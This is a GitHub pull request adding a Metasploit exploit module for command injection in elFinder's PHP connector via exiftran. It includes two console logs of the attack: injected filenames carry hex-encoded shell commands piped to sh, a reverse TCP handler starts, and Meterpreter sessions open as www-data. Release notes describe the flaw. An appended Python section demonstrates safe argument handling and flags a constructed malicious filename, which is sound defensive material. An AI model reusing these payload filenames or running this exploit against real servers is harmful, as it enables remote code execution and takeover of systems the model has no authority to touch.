Add elFinder PHP Connector exiftran Command Injection #11545

Merged
merged 3 commits into from Mar 11, 2019

bcoles commented Mar 9, 2019

Add elFinder PHP Connector exiftran Command Injection exploit module. Fixes #11539

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
rhosts => 172.16.191.253
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
verbose => true
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
[*] 172.16.191.253:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
[*] Sending stage (38247 bytes) to 172.16.191.253
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
[!] Tried to delete .kPUXqhMZ.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > 

@bcoles bcoles added module docs labels Mar 9, 2019

@space-r7 space-r7 self-assigned this Mar 11, 2019

space-r7 commented Mar 11, 2019

Tested v2.1.47 on Ubuntu:

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.215.167
rhosts => 172.16.215.167
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Uploading payload 'foK272.jpg;echo 6370202e2e2f66696c65732f666f4b3237322e6a70672a6563686f2a202e33486c323733722e706870 |xxd -r -p |sh& #.jpg' (1853 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.3Hl273r.php) ...
[*] Sending stage (38247 bytes) to 172.16.215.167
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.167:57360) at 2019-03-11 12:28:41 -0500
[!] Tried to delete .3Hl273r.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64
Meterpreter : php/linux

Code looks good to me, so I can land this soon.

@space-r7 space-r7 merged commit 6d14a53 into rapid7:master Mar 11, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

space-r7 added a commit that referenced this pull request Mar 11, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 11, 2019

space-r7 commented Mar 11, 2019

Release Notes

This adds a module that exploits a command injection vulnerability in elFinder versions < 2.1.48. elFinder allows for resizing and rotating images by passing the image file data, including unsanitized file names, to the exiftran utility. Code execution can be achieved when performing an image operation on a file whose name contains shell commands.

@bcoles bcoles deleted the bcoles:elfinder_php_connector_exiftran_cmd_injection branch Mar 11, 2019
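
The root cause named in the release notes, a file name pasted unsanitized into an exiftran command line, is shown below as an added example for defenders; it is not code from elFinder or from the Metasploit module. It uses Python in place of the PHP connector, and `UPLOAD_DIR`, the allowlist pattern and both sample names are assumptions constructed for illustration.

```python
import re
import shlex

UPLOAD_DIR = "/var/www/files"  # assumed upload directory (hypothetical)
# Allowlist for stored image names: no shell metacharacters, no path separators.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._ -]{0,200}\.(?:jpe?g|png|gif)", re.I)


def naive_command(name):
    """The flawed pattern: the file name is pasted into a shell command string."""
    return f"exiftran -i -9 {UPLOAD_DIR}/{name}"


def quoted_command(name):
    """Same string, but the path is quoted so the shell sees a single word."""
    return "exiftran -i -9 " + shlex.quote(f"{UPLOAD_DIR}/{name}")


def shell_words(command):
    """Tokenise roughly as a POSIX shell would, keeping ; | & as separate tokens."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def is_single_invocation(command, name):
    """True only if the shell would see one exiftran call on the intended path."""
    return shell_words(command) == ["exiftran", "-i", "-9", f"{UPLOAD_DIR}/{name}"]


def safe_argv(name):
    """Preferred form: validate the name, then pass an argv list (no shell at all)."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected file name: {name!r}")
    return ["exiftran", "-i", "-9", f"{UPLOAD_DIR}/{name}"]


def flag_names(names):
    """Detection helper: stored names that fail the allowlist."""
    return [n for n in names if not SAFE_NAME.fullmatch(n)]


# Constructed samples; the second copies the shape of the file names in the logs above.
BENIGN = "holiday photo.jpg"
HOSTILE = "photo.jpg;echo constructed-marker #.jpg"

if __name__ == "__main__":
    for name in (BENIGN, HOSTILE):
        print(repr(name), is_single_invocation(naive_command(name), name),
              is_single_invocation(quoted_command(name), name))
    print(flag_names([BENIGN, HOSTILE]))
```

The naive form fails the single-invocation check even for the benign name with a space, which is why the argv list from `safe_argv` (for example with `subprocess.run(argv)`) is the form to prefer over quoting.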
